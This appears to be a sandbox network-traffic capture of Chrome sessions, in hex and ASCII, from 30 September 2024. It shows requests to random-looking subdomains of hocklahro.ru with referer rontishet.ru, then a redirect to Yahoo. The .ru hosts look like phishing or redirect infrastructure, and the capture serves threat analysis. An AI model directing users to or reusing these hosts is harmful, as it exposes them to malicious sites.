                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:51 UTC1369INData Raw: 38 71 71 4b 66 73 4c 61 68 70 70 4b 53 70 59 6d 56 67 4b 2f 48 78 4b 61 70 69 36 58 4d 74 73 6a 48 79 37 4b 6d 73 72 6a 54 77 64 50 69 74 63 44 64 7a 74 62 62 6f 64 53 38 74 73 62 49 78 63 72 77 76 4f 6a 50 33 2f 4c 58 36 73 37 52 30 74 66 56 38 39 72 79 7a 63 48 54 42 63 4c 79 32 75 4c 43 32 4e 38 45 43 64 2f 6e 41 73 6a 45 38 42 59 4e 34 2f 4c 50 30 41 30 53 39 2b 33 64 38 4e 67 68 2b 50 6f 6d 33 4f 55 49 47 67 51 55 44 42 55 41 48 67 77 6a 43 77 6b 4f 42 52 34 6c 46 43 6b 31 46 51 2f 34 2b 52 4d 58 48 53 30 4d 4f 45 5a 45 42 43 41 56 51 54 67 71 4b 78 59 4c 4c 69 78 4a 49 69 77 67 46 6b 51 34 49 30 67 62 4c 79 6c 5a 51 46 55 37 4f 7a 70 61 58 42 34 78 51 44 56 56 57 30 68 65 51 44 31 43 53 7a 4a 44 54 57 55 31 61 32 78 71 62 55 5a 57 57 56 5a 79 56 55
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 8qqKfsLahppKSpYmVgK/HxKapi6XMtsjHy7KmsrjTwdPitcDdztbbodS8tsbIxcrwvOjP3/LX6s7R0tfV89ryzcHTBcLy2uLC2N8ECd/nAsjE8BYN4/LP0A0S9+3d8Ngh+Pom3OUIGgQUDBUAHgwjCwkOBR4lFCk1FQ/4+RMXHS0MOEZEBCAVQTgqKxYLLixJIiwgFkQ4I0gbLylZQFU7OzpaXB4xQDVVW0heQD1CSzJDTWU1a2xqbUZWWVZyVU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:51 UTC1369INData Raw: 6e 72 50 43 75 4a 72 44 6a 4b 43 73 69 61 47 74 73 35 47 79 74 71 4b 56 71 37 58 4f 74 64 2b 35 77 4b 72 58 74 4d 43 75 77 62 32 66 79 74 4f 2b 37 4d 57 6b 77 2f 44 53 76 4d 58 6c 77 72 54 49 31 4d 72 57 36 4f 37 6e 76 74 37 4e 31 73 37 61 34 4f 45 48 34 63 44 61 34 4f 6e 6f 31 51 54 75 42 42 48 69 39 4d 7a 52 33 75 73 4c 39 74 48 75 44 2b 62 35 38 4e 6a 75 39 66 77 58 47 52 66 37 48 76 34 48 42 69 45 61 39 77 7a 6f 4c 66 49 4d 45 66 30 34 4a 68 50 30 38 77 38 78 44 6a 6f 72 43 79 78 42 47 51 38 30 51 79 5a 4b 45 77 6b 69 54 51 41 5a 4d 45 55 61 53 53 73 4d 45 69 30 77 4a 43 5a 54 4d 46 41 32 55 54 49 59 51 30 77 2f 51 6a 49 6e 52 7a 56 64 52 45 77 38 52 30 68 50 63 6a 39 63 53 79 39 50 53 46 64 36 53 31 42 70 57 56 4e 50 56 48 52 53 67 31 39 69 58 33 64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: nrPCuJrDjKCsiaGts5GytqKVq7XOtd+5wKrXtMCuwb2fytO+7MWkw/DSvMXlwrTI1MrW6O7nvt7N1s7a4OEH4cDa4Ono1QTuBBHi9MzR3usL9tHuD+b58Nju9fwXGRf7Hv4HBiEa9wzoLfIMEf04JhP08w8xDjorCyxBGQ80QyZKEwkiTQAZMEUaSSsMEi0wJCZTMFA2UTIYQ0w/QjInRzVdREw8R0hPcj9cSy9PSFd6S1BpWVNPVHRSg19iX3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:51 UTC375INData Raw: 4b 72 52 6b 61 32 6e 73 73 76 54 78 4b 65 59 32 71 2b 6e 70 70 54 4e 76 35 6d 67 7a 5a 2b 78 35 4e 58 44 75 65 6a 59 33 62 36 67 33 65 44 74 75 73 57 75 7a 37 2f 6c 37 62 54 7a 35 73 7a 50 79 4f 6d 36 76 73 76 57 42 63 48 45 38 63 4c 47 30 76 6e 62 34 51 33 38 33 38 77 52 41 76 4d 57 33 75 76 6e 38 74 6f 4a 39 74 67 59 43 74 6f 68 31 42 48 7a 49 65 62 37 48 67 49 72 2b 68 30 65 41 2f 72 73 35 79 49 4f 36 69 66 6f 39 75 34 6b 46 2f 48 30 47 54 49 70 4f 79 49 52 2f 41 56 45 49 41 4d 68 53 42 34 58 44 51 67 35 47 54 38 79 4b 51 38 65 4a 69 35 42 49 6c 4d 6b 4c 53 74 63 4b 46 45 75 56 31 70 50 54 79 45 36 57 6d 51 32 59 46 51 71 59 47 35 44 4d 55 6c 49 50 57 39 49 54 6b 6c 44 56 6a 4a 73 53 46 34 33 56 56 35 75 65 59 46 4e 56 6e 4a 44 57 6c 74 7a 59 57 78 2b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: KrRka2nssvTxKeY2q+nppTNv5mgzZ+x5NXDuejY3b6g3eDtusWuz7/l7bTz5szPyOm6vsvWBcHE8cLG0vnb4Q3838wRAvMW3uvn8toJ9tgYCtoh1BHzIeb7HgIr+h0eA/rs5yIO6ifo9u4kF/H0GTIpOyIR/AVEIAMhSB4XDQg5GT8yKQ8eJi5BIlMkLStcKFEuV1pPTyE6WmQ2YFQqYG5DMUlIPW9ITklDVjJsSF43VV5ueYFNVnJDWltzYWx+


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    32192.168.2.449787104.18.95.414434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:51 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/194391686:1727712828:JRtCI2iqmwXzQ6uA9YbttRQhBtGvVV2Rs_-r0xzpao4/8cb5e237ab880f47/1bf49d3282149e4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:51 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:51 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cf-chl-out: qeLW0sh70VEIXNS0aLbpOr9H5XbpcYYNHHc=$seEsvBHZWAH/7C7M
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8cb5e2d3efa980da-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:51 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: invalid


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    33192.168.2.449789104.21.93.964434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:52 UTC669OUTGET /dyxqqctqfxmdjbdkrdklknqcEsIhjbfqHMJIASFGXPYJHJHBMKSVBSWCVNJCXIPDVXPZRGDUP HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: ht4hkoldfwqkuse7qoti8nr4vfbfcgkyagnd3phsgq5swccnhjjxv.hocklahro.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Origin: https://hfj.rontishet.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://hfj.rontishet.ru/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:53 UTC693INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BxL%2Bcuz40rd8JYG7Zx9xUu%2FF89OYqGXBUx0YRILIJQXIh5dlv%2BOa4XfkC8Lfq1sr1MJyFSp9Df8IuZkDqkZiXMocyDNEscDB2QiWRlRCKyzVuwbyrSUuo9X0MPSZiqkp4IWYiPCY8EW90dnJWxvRdGwbznpW1v0jRqX2wXDqaAdR%2B7PyqLHec%2Bvb80dgjXACU9DxLFE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8cb5e2d83cb18c12-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:53 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    34192.168.2.449792172.67.208.1294434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:53 UTC463OUTGET /dyxqqctqfxmdjbdkrdklknqcEsIhjbfqHMJIASFGXPYJHJHBMKSVBSWCVNJCXIPDVXPZRGDUP HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: ht4hkoldfwqkuse7qoti8nr4vfbfcgkyagnd3phsgq5swccnhjjxv.hocklahro.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:54 UTC697INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gURg6%2FhIIZIJ4DnXhq8lTwGSoezDQYpFKmCV9uArC3DSngCSEK5dUFicOi3dxCNVham6TsFACiu8C37JLrpVet%2F8KiyhTLdsSl%2BLmSRS5%2F3FdBnLKKveSRWcc%2BSBmcn%2BW3aNUcj9JpFQjhjYHwmq%2BOGvwisq1%2FABhJwZYyNS1B1NGUAelBiNgaSR6uwyPeWx1wGpF7E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8cb5e2e0592fc34a-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:54 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    35192.168.2.44979174.6.231.214434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:53 UTC694OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://hfj.rontishet.ru/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:53 UTC428INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:20:53 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Language: en
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Location: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:53 UTC8INData Raw: 72 65 64 69 72 65 63 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: redirect


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    36192.168.2.44979387.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:54 UTC698OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://hfj.rontishet.ru/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:55 UTC1175INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    expect-ct: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    date: Mon, 30 Sep 2024 17:20:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-envoy-upstream-service-time: 88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, max-age=0, private
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; Expires=Tue, 30 Sep 2025 23:20:55 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=Lax; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; Expires=Tue, 30 Sep 2025 23:20:55 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; Domain=.yahoo.com; Path=/; SameSite=Lax; Secure
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:55 UTC762INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:55 UTC5INData Raw: 66 36 32 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: f62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:55 UTC1300INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 20 69 64 3d 61 74 6f 6d 69 63 20 63 6c 61 73 73 3d 22 6c 74 72 20 66 70 20 20 64 65 73 6b 74 6f 70 20 20 66 70 2d 6e 6f 6e 65 20 62 6b 74 39 30 30 2c 73 65 61 6d 6c 65 73 73 20 75 61 2d 63 68 72 6f 6d 65 20 75 61 2d 31 31 37 2e 30 20 69 73 4d 6f 64 65 72 6e 22 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 32 34 62 34 32 35 62 38 38 36 64 33 30 36 39 61 35 34 35 30 37 32 36 38 31 31 62 66 65 34 63 61 38 31 63 65 36 31 65 35 33 63 37 35 36 32 34 64 37 63 61 31 39 62 62 61 32 35 37 34 63 31 38 34 3e 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <!doctype html><html data-color-scheme id=atomic class="ltr fp desktop fp-none bkt900,seamless ua-chrome ua-117.0 isModern" lang=en-US><head><script nonce=24b425b886d3069a5450726811bfe4ca81ce61e53c75624d7ca19bba2574c184> window.performance.mark(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:55 UTC854INData Raw: 6d 61 69 6c 2c 20 79 61 68 6f 6f 20 6d 65 73 73 65 6e 67 65 72 2c 20 79 61 68 6f 6f 20 67 61 6d 65 73 2c 20 6e 65 77 73 2c 20 66 69 6e 61 6e 63 65 2c 20 73 70 6f 72 74 2c 20 65 6e 74 65 72 74 61 69 6e 6d 65 6e 74 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 66 62 3a 61 70 70 5f 69 64 20 63 6f 6e 74 65 6e 74 3d 22 34 35 38 35 38 34 32 38 38 32 35 37 32 34 31 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 69 6d 61 67 65 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 63 76 2f 61 70 69 76 32 2f 73 6f 63 69 61 6c 2f 69 6d 61 67 65 73 2f 79 61 68 6f 6f 5f 64 65 66 61 75 6c 74 5f 6c 6f 67 6f 2e 70 6e 67 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 66 62 3a 70 61 67 65 73 20 63 6f 6e 74 65 6e 74 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: mail, yahoo messenger, yahoo games, news, finance, sport, entertainment"><meta property=fb:app_id content="458584288257241"><meta property=og:image content="https://s.yimg.com/cv/apiv2/social/images/yahoo_default_logo.png"><meta property=fb:pages content=
